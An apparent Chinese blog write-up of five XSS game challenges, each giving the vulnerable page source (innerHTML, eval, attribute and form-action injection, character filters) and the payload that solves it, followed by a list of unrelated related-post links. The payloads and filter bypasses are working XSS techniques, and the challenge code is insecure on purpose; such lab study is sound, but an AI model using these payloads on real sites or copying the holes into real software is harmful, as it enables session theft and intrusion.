xss 漏洞复现

xss 漏洞复现

一,xss game

1,源码

复制代码
<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

题目分析:接收somebody参数放入innerHTML,然后放在

标签展示。innerHTML标签中警用了script标签,所以使用标签。

复制代码
?somebody=<img src=1 onerror="alert(1337)">

2,源码

复制代码
<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

//eval(`ma = "Ma name a";alert(1337);""`)

题目分析:innertext会把<>当成字符串解析,安全系数很高,此题危险方法是eval,进行闭合操作。

复制代码
思路一  ?jeff=a";alert(1337);"
思路二  ?jeff=a"-alert(1337);-"  连接符
       ?jeff=a"-alert(1337);"

3,源码

复制代码
<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')  //过滤了<>
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

题目分析:闭合"${wey}"处的双引号,加入我们的方法。

复制代码
?wey=aaa"%20onfocus=alert(1337)%20autofocus="    
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数

4,源码

复制代码
<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)  //两秒后自动提交
</script>

题目分析:表单的action处也会出现相应的伪协议事件,需要提交触发。

复制代码
?ricardo=javascript:alert(1337)

5,源码

复制代码
<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '') 
    will.innerHTML = smith
</script>

题目分析:过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码

复制代码
?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

img%20src=1%20οnerrοr=location="javascript:alert%25281337%2529">

复制代码
[外链图片转存中...(img-INiW5cpV-1724041595122)]
相关推荐
Highcharts.js3 小时前
Highcharts 云端渲染的真相:交互式图表与服务器端生成的边界
前端·信息可视化·服务器渲染·highcharts·图表渲染
zhuyan1084 小时前
Linux 系统磁盘爆满导致无法启动修复指南
前端·chrome
编程牛马姐4 小时前
独立站SEO流量增长:提高Google排名的优化方法
前端·javascript·网络
NotFound4864 小时前
实战指南如何实现Java Web 拦截机制:Filter 与 Interceptor 深度分享
java·开发语言·前端
Dontla5 小时前
高基数(High Cardinality)问题介绍(Prometheus、高基数字段、低基数字段)
前端·数据库·prometheus
whuhewei7 小时前
为什么客户端不存在跨域问题
前端·安全
妮妮喔妮7 小时前
supabase的webhook报错
开发语言·前端·javascript
yivifu8 小时前
手搓HTML双行夹批效果
前端·html·html双行夹注
奔跑的卡卡8 小时前
Web开发与AI融合-第一篇:Web开发与AI融合的时代序幕
前端·人工智能
IT_陈寒9 小时前
Redis批量删除的大坑,差点让我加班到天亮
前端·人工智能·后端